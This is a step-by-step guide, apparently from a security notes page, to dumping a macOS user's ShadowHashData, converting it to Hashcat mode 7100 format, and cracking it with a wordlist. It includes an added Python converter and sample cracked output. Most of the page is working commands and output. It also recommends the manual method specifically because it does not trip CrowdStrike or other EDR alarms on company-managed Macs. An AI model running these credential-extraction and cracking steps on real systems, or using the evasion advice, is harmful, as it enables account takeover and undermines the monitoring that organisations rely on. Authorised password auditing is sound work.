# Password Cracking
Once you have obtained the user's .plist file from /var/db/dslocal/nodes/Default/users/ you can extract the hash and format an entry that Hashcat will understand. Modern macOS systems use a PBKDF2-SHA512 hash.
```bash
# Get the list of users (if needed)
dscl . -list /Users
# Read the ShadowHashData entry of their .plist file
sudo dscl . -read /Users/steve ShadowHashData >> newuser.hashdata
# Convert the data and write to a .plist file
cat newuser.hashdata | tail -n 1 | xxd -r -p | plutil -convert xml1 - -o newuser.plist
# View the data
cat newuser.plist
```
## Manually convert the hash into Hashcat format for cracking
These steps describe how to extract the hash manually and build a valid entry that Hashcat can crack. The next section links to a script that performs this whole process for you and is much quicker. The only problem with the script is that if your macOS host is managed by a company, it will set off alarms in security tools such as CrowdStrike or other EDR software. Doing this manually does not trip any alarms.
The Hashcat format that we need looks like this:

```
$ml$<iterations(integer)>$<salt(hex)>$<entropy(hex)>
```
| Keyword | Description |
|---|---|
| iterations | A plain integer, copied straight from the plist |
| salt | The raw salt bytes as hex; the plist stores them base64-encoded, so they must be decoded and re-encoded as hex |
| entropy | The raw PBKDF2 output bytes as hex; the plist stores them base64-encoded, so they must be decoded and re-encoded as hex |
The data we are interested in is the SALTED-SHA512-PBKDF2 entry:

```xml
<key>SALTED-SHA512-PBKDF2</key>
<dict>
<key>entropy</key>
<data>
fN0UaJVva6Fbqjkfrwdem2jJJHsDilfZFs9U4mAdsptZLC6r/nKMVBIQH5IU
auXBW/E4PwGDsczqONxE2fUQ0dkOgAKRVwnAghsIjdYxLsuK8v49MfqYgHUm
+c2oWGC6odhO6KPBpSOSGTcuAuJh6s6db995GrN5eT/zbENFrDg=
</data>
<key>iterations</key>
<integer>123456</integer>
<key>salt</key>
<data>
2sVKYYXpCALwLH6uHzzeH/0KgaPbl++OW0baubgcJwo=
</data>
</dict>
```
The iterations value is a plain integer that we can copy straight into the Hashcat format.

After that, we calculate the salt value (base64 decode, then hex encode) and write it out to a file called salt:

```bash
echo "2sVKYYXpCALwLH6uHzzeH/0KgaPbl++OW0baubgcJwo=" | base64 -D | xxd -p | tr -d \\n > salt
cat salt
```

```
dac54a6185e90802f02c7eae1f3cde1ffd0a81a3db97ef8e5b46dab9b81c270a
```
Next, calculate the entropy value the same way and write it out to a file called entropy:

```bash
echo "fN0UaJVva6Fbqjkfrwdem2jJJHsDilfZFs9U4mAdsptZLC6r/nKMVBIQH5IUauXBW/E4PwGDsczqONxE2fUQ0dkOgAKRVwnAghsIjdYxLsuK8v49MfqYgHUm+c2oWGC6odhO6KPBpSOSGTcuAuJh6s6db995GrN5eT/zbENFrDg=" | base64 -D | xxd -p | tr -d \\n > entropy
cat entropy
```

```
7cdd1468956f6ba15baa391faf075e9b68c9247b038a57d916cf54e2601db29b592c2eabfe728c5412101f92146ae5c15bf1383f0183b1ccea38dc44d9f510d1d90e8002915709c0821b088dd6312ecb8af2fe3d31fa98807526f9cda85860baa1d84ee8a3c1a5239219372e02e261eace9d6fdf791ab379793ff36c4345ac38
```
Putting this together in the format shown at the beginning gives the full value below. Save it to a file called hash.txt:

```
$ml$123456$dac54a6185e90802f02c7eae1f3cde1ffd0a81a3db97ef8e5b46dab9b81c270a$7cdd1468956f6ba15baa391faf075e9b68c9247b038a57d916cf54e2601db29b592c2eabfe728c5412101f92146ae5c15bf1383f0183b1ccea38dc44d9f510d1d90e8002915709c0821b088dd6312ecb8af2fe3d31fa98807526f9cda85860baa1d84ee8a3c1a5239219372e02e261eace9d6fdf791ab379793ff36c4345ac38
```
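The manual steps above are easy to get subtly wrong (a stray newline, a base64 line break, a truncated hex string), and the format itself is only meaningful if you know what Hashcat mode 7100 computes. The following Python is an added example written for this page, not code from the page's author or from the linked gist. It reads a SALTED-SHA512-PBKDF2 entry from an XML plist exactly as plutil emits it, builds the `$ml$` line (with the optional `username:` prefix the gist's output uses), validates the line against the sizes seen in the sample above (32-byte salt, 128-byte entropy), and confirms that the entropy is PBKDF2-HMAC-SHA512 by recomputing it for a known test password. The test password, salt and low iteration count are constructed here so the check runs offline in well under a second; the page's own `$ml$` line is included only to show that the parser accepts a real-shaped entry.

```python
import hashlib
import hmac
import plistlib
import re
from typing import Optional, Tuple

# Constructed test values (not a real user's hash): a known password, a fixed
# 32-byte salt and a deliberately low iteration count so the self-check is fast.
# Real macOS accounts use a much higher count (the page's sample shows 123456).
TEST_PASSWORD = b"correct horse battery staple"
TEST_SALT = bytes(range(32))
TEST_ITERATIONS = 20000

# The $ml$ line from this page, used only to check that the parser accepts it.
PAGE_HASH_LINE = (
    "$ml$123456$dac54a6185e90802f02c7eae1f3cde1ffd0a81a3db97ef8e5b46dab9b81c270a$"
    "7cdd1468956f6ba15baa391faf075e9b68c9247b038a57d916cf54e2601db29b592c2eabfe728c54"
    "12101f92146ae5c15bf1383f0183b1ccea38dc44d9f510d1d90e8002915709c0821b088dd6312ecb"
    "8af2fe3d31fa98807526f9cda85860baa1d84ee8a3c1a5239219372e02e261eace9d6fdf791ab379"
    "793ff36c4345ac38"
)

# A mode-7100 line, optionally prefixed with "username:" (the form the gist's
# script emits, which is why hashcat then needs --username).
ML_LINE = re.compile(
    r"^(?:(?P<user>[^:$]+):)?\$ml\$(?P<iter>\d+)\$(?P<salt>[0-9a-f]+)\$(?P<entropy>[0-9a-f]+)$"
)


def derive_entropy(password: bytes, salt: bytes, iterations: int, length: int = 128) -> bytes:
    """SALTED-SHA512-PBKDF2 is PBKDF2-HMAC-SHA512; macOS stores a 128-byte result."""
    return hashlib.pbkdf2_hmac("sha512", password, salt, iterations, dklen=length)


def build_sample_plist() -> bytes:
    """Build an XML plist shaped like the plutil output on this page from the constructed values."""
    entropy = derive_entropy(TEST_PASSWORD, TEST_SALT, TEST_ITERATIONS)
    return plistlib.dumps(
        {"SALTED-SHA512-PBKDF2": {"entropy": entropy, "iterations": TEST_ITERATIONS, "salt": TEST_SALT}},
        fmt=plistlib.FMT_XML,
    )


def plist_to_hashcat(plist_bytes: bytes, username: Optional[str] = None) -> str:
    """Convert the SALTED-SHA512-PBKDF2 entry to a mode-7100 line.

    plistlib decodes <data> elements from base64 to bytes; .hex() then does what
    the manual `base64 -D | xxd -p | tr -d \\n` pipeline does, with no newline risk.
    """
    entry = plistlib.loads(plist_bytes)["SALTED-SHA512-PBKDF2"]
    line = "$ml$%d$%s$%s" % (entry["iterations"], entry["salt"].hex(), entry["entropy"].hex())
    return f"{username}:{line}" if username else line


def parse_hashcat_line(line: str) -> Tuple[int, bytes, bytes]:
    """Validate a mode-7100 line and return (iterations, salt, entropy).

    The size checks match the sample on this page (32-byte salt, 128-byte entropy);
    a mismatch almost always means a copy/paste or conversion slip.
    """
    m = ML_LINE.match(line.strip())
    if not m:
        raise ValueError("not a $ml$ line")
    iterations = int(m["iter"])
    salt = bytes.fromhex(m["salt"])
    entropy = bytes.fromhex(m["entropy"])
    if iterations <= 0 or len(salt) != 32 or len(entropy) != 128:
        raise ValueError(f"unexpected sizes: salt={len(salt)} entropy={len(entropy)}")
    return iterations, salt, entropy


def verify_password(line: str, candidate: bytes) -> bool:
    """Recompute the entropy for one candidate and compare it in constant time."""
    iterations, salt, entropy = parse_hashcat_line(line)
    return hmac.compare_digest(derive_entropy(candidate, salt, iterations, len(entropy)), entropy)


if __name__ == "__main__":
    line = plist_to_hashcat(build_sample_plist())
    print(line)
    print("known test password matches:", verify_password(line, TEST_PASSWORD))
```

To check a conversion you did by hand, pass the contents of hash.txt to `parse_hashcat_line`; to check one you generated from a real plist, pass the bytes of newuser.plist to `plist_to_hashcat` and compare the result with the line you built manually.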
## Automated conversion of the hash into Hashcat format for cracking
This script will be detected by security software. Use at your own risk!

https://gist.github.com/teddziuba/3ff08bdda120d1f7822f3baf52e606c2

```bash
python3 osx_extract_hash.py username
```

This output will use the username as a prefix to the Hashcat format. Therefore, you will need to alter the Hashcat command to include the --username option. Review the header comments of the script for more information.
## Run Hashcat to attempt cracking the password
Get the Hashcat mode for macOS. In this case, we need the PBKDF2-SHA512 mode, 7100:

```bash
hashcat --help | grep -i macos
```

```
122 | macOS v10.4, macOS v10.5, macOS v10.6 | Operating System
1722 | macOS v10.7 | Operating System
7100 | macOS v10.8+ (PBKDF2-SHA512) | Operating System
```
Run hashcat to crack the password hash using a password list:

```bash
hashcat -a 0 -m 7100 hash.txt wordlist.txt
# or if you used the script:
hashcat -a 0 -m 7100 --username hash.txt wordlist.txt
```
Sample output (truncated):

```
...
$ml$123456$dac54a6185e90802f02c7eae1f3cde1ffd0a81a3db97ef8e5b46dab9b81c270a$7cdd1468956f6ba15baa391faf075e9b68c9247b038a57d916cf54e2601db29b592c2eabfe728c5412101f92146ae5c15bf1383f0183b1ccea38dc44d9f510d1d90e8002915709c0821b088dd6312ecb8af2fe3d31fa98807526f9cda85860baa1d84ee8a3c1a5239219372e02e261eace9d6fdf791ab379793ff36c4345ac38:P@ssw0rd
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 7100 (macOS v10.8+ (PBKDF2-SHA512))
Hash.Target......: $ml$123456$dac54a6185e90802f02c7eae1f3cde1ffd0a81a3...45ac38
Time.Started.....: Sat Jan 4 12:30:15 2025 (22 secs)
Time.Estimated...: Sat Jan 4 12:30:37 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (password.lst)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 0 H/s (0.95ms) @ Accel:96 Loops:8 Thr:32 Vec:1
Speed.#2.........: 0 H/s (0.00ms) @ Accel:64 Loops:128 Thr:128 Vec:1
Speed.#*.........: 0 H/s
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 5/5 (100.00%)
Rejected.........: 0/5 (0.00%)
Restore.Point....: 0/5 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:123448-123455
Restore.Sub.#2...: Salt:0 Amplifier:0-0 Iteration:0-128
Candidate.Engine.: Device Generator
Candidates.#1....: password -> P@ssw0rd
Candidates.#2....: [Copying]
Hardware.Mon.#1..: Util: 81%
Hardware.Mon.#2..: Util: 0%
[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit => Started: Sat Jan 4 12:29:46 2025
Stopped: Sat Jan 4 12:30:38 2025
```
Show the cracked password. The output is in the format hash:password. In this case the password is P@ssw0rd.

```bash
hashcat -m 7100 hash.txt -a 0 password.lst --show
```

```
$ml$123456$dac54a6185e90802f02c7eae1f3cde1ffd0a81a3db97ef8e5b46dab9b81c270a$7cdd1468956f6ba15baa391faf075e9b68c9247b038a57d916cf54e2601db29b592c2eabfe728c5412101f92146ae5c15bf1383f0183b1ccea38dc44d9f510d1d90e8002915709c0821b088dd6312ecb8af2fe3d31fa98807526f9cda85860baa1d84ee8a3c1a5239219372e02e261eace9d6fdf791ab379793ff36c4345ac38:P@ssw0rd
```
NOTE: It is recommended to perform only a wordlist attack, since a brute-force attack against this hash would take decades to complete.